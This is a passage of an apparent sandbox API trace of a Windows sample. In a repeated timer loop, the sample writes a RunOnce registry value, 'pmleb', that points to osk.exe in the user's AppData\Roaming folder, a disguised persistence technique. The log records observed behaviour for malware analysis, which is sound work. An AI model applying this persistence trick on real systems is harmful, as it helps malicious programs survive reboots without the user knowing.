lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.451] RegCloseKey (hKey=0x280) returned 0x0 [0093.451] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.451] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.451] SetTimer (hWnd=0x20280, nIDEvent=0x2237, uElapse=0xa, lpTimerFunc=0x0) returned 0x2237 [0093.451] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.465] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.465] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.465] KillTimer (hWnd=0x20280, uIDEvent=0x2237) returned 1 [0093.466] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.466] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.466] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.466] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.466] RegCloseKey (hKey=0x280) returned 0x0 [0093.467] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.467] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.467] SetTimer (hWnd=0x20280, nIDEvent=0x2238, uElapse=0xa, lpTimerFunc=0x0) returned 0x2238 [0093.467] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.481] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.481] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.481] KillTimer (hWnd=0x20280, uIDEvent=0x2238) returned 1 [0093.481] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.481] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.481] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.482] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.482] RegCloseKey (hKey=0x280) returned 0x0 [0093.482] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.482] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.482] SetTimer (hWnd=0x20280, nIDEvent=0x2239, uElapse=0xa, lpTimerFunc=0x0) returned 0x2239 [0093.482] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.496] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.496] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.496] KillTimer (hWnd=0x20280, uIDEvent=0x2239) returned 1 [0093.497] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.497] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.497] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.498] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.498] RegCloseKey (hKey=0x280) returned 0x0 [0093.498] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.498] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.498] SetTimer (hWnd=0x20280, nIDEvent=0x223a, uElapse=0xa, lpTimerFunc=0x0) returned 0x223a [0093.498] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.512] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.512] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.512] KillTimer (hWnd=0x20280, uIDEvent=0x223a) returned 1 [0093.512] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.513] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.513] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.513] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.513] RegCloseKey (hKey=0x280) returned 0x0 [0093.513] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.513] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.514] SetTimer (hWnd=0x20280, nIDEvent=0x223b, uElapse=0xa, lpTimerFunc=0x0) returned 0x223b [0093.514] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.527] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.527] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.528] KillTimer (hWnd=0x20280, uIDEvent=0x223b) returned 1 [0093.528] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.528] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.529] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.529] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.529] RegCloseKey (hKey=0x280) returned 0x0 [0093.529] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.529] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.529] SetTimer (hWnd=0x20280, nIDEvent=0x223c, uElapse=0xa, lpTimerFunc=0x0) returned 0x223c [0093.529] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.543] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.543] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.543] KillTimer (hWnd=0x20280, uIDEvent=0x223c) returned 1 [0093.544] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.544] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.544] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.544] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.544] RegCloseKey (hKey=0x280) returned 0x0 [0093.545] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.545] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.545] SetTimer (hWnd=0x20280, nIDEvent=0x223d, uElapse=0xa, lpTimerFunc=0x0) returned 0x223d [0093.545] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.559] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.559] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.559] KillTimer (hWnd=0x20280, uIDEvent=0x223d) returned 1 [0093.559] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.560] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.560] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.560] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.560] RegCloseKey (hKey=0x280) returned 0x0 [0093.560] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.560] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.560] SetTimer (hWnd=0x20280, nIDEvent=0x223e, uElapse=0xa, lpTimerFunc=0x0) returned 0x223e [0093.560] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.575] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.575] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.575] KillTimer (hWnd=0x20280, uIDEvent=0x223e) returned 1 [0093.575] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.576] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.576] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.576] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.576] RegCloseKey (hKey=0x280) returned 0x0 [0093.576] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.576] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.576] SetTimer (hWnd=0x20280, nIDEvent=0x223f, uElapse=0xa, lpTimerFunc=0x0) returned 0x223f [0093.577] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.590] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.590] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.590] KillTimer (hWnd=0x20280, uIDEvent=0x223f) returned 1 [0093.590] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.591] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.591] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.591] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.591] RegCloseKey (hKey=0x280) returned 0x0 [0093.591] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.591] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.591] SetTimer (hWnd=0x20280, nIDEvent=0x2240, uElapse=0xa, lpTimerFunc=0x0) returned 0x2240 [0093.591] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.605] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.605] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.606] KillTimer (hWnd=0x20280, uIDEvent=0x2240) returned 1 [0093.606] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.606] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.606] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.607] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.607] RegCloseKey (hKey=0x280) returned 0x0 [0093.607] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.607] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.607] SetTimer (hWnd=0x20280, nIDEvent=0x2241, uElapse=0xa, lpTimerFunc=0x0) returned 0x2241 [0093.607] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.621] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.621] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.621] KillTimer (hWnd=0x20280, uIDEvent=0x2241) returned 1 [0093.622] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.622] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.623] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.623] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.623] RegCloseKey (hKey=0x280) returned 0x0 [0093.623] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.623] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.623] SetTimer (hWnd=0x20280, nIDEvent=0x2242, uElapse=0xa, lpTimerFunc=0x0) returned 0x2242 [0093.623] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.637] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.637] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.637] KillTimer (hWnd=0x20280, uIDEvent=0x2242) returned 1 [0093.637] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.638] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.638] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.638] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.638] RegCloseKey (hKey=0x280) returned 0x0 [0093.638] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.638] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.638] SetTimer (hWnd=0x20280, nIDEvent=0x2243, uElapse=0xa, lpTimerFunc=0x0) returned 0x2243 [0093.639] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.678] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.678] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.678] KillTimer (hWnd=0x20280, uIDEvent=0x2243) returned 1 [0093.678] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.679] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.679] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.679] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.679] RegCloseKey (hKey=0x280) returned 0x0 [0093.679] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.679] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.680] SetTimer (hWnd=0x20280, nIDEvent=0x2244, uElapse=0xa, lpTimerFunc=0x0) returned 0x2244 [0093.680] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.685] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.685] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.685] KillTimer (hWnd=0x20280, uIDEvent=0x2244) returned 1 [0093.686] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.686] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.686] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.686] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.686] RegCloseKey (hKey=0x280) returned 0x0 [0093.687] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.687] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.687] SetTimer (hWnd=0x20280, nIDEvent=0x2245, uElapse=0xa, lpTimerFunc=0x0) returned 0x2245 [0093.687] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.699] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.699] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.699] KillTimer (hWnd=0x20280, uIDEvent=0x2245) returned 1 [0093.699] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.700] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.700] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.700] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.700] RegCloseKey (hKey=0x280) returned 0x0 [0093.700] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.700] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.700] SetTimer (hWnd=0x20280, nIDEvent=0x2246, uElapse=0xa, lpTimerFunc=0x0) returned 0x2246 [0093.701] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.715] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.715] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.715] KillTimer (hWnd=0x20280, uIDEvent=0x2246) returned 1 [0093.715] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.716] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.716] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.716] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.716] RegCloseKey (hKey=0x280) returned 0x0 [0093.716] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.716] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.716] SetTimer (hWnd=0x20280, nIDEvent=0x2247, uElapse=0xa, lpTimerFunc=0x0) returned 0x2247 [0093.716] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.730] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.730] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.730] KillTimer (hWnd=0x20280, uIDEvent=0x2247) returned 1 [0093.731] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.731] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.731] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.731] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.731] RegCloseKey (hKey=0x280) returned 0x0 [0093.731] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.732] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.732] SetTimer (hWnd=0x20280, nIDEvent=0x2248, uElapse=0xa, lpTimerFunc=0x0) returned 0x2248 [0093.732] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.747] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.747] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.747] KillTimer (hWnd=0x20280, uIDEvent=0x2248) returned 1 [0093.747] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.748] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.748] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.748] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.748] RegCloseKey (hKey=0x280) returned 0x0 [0093.748] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.748] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.748] SetTimer (hWnd=0x20280, nIDEvent=0x2249, uElapse=0xa, lpTimerFunc=0x0) returned 0x2249 [0093.748] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.762] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.762] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.762] KillTimer (hWnd=0x20280, 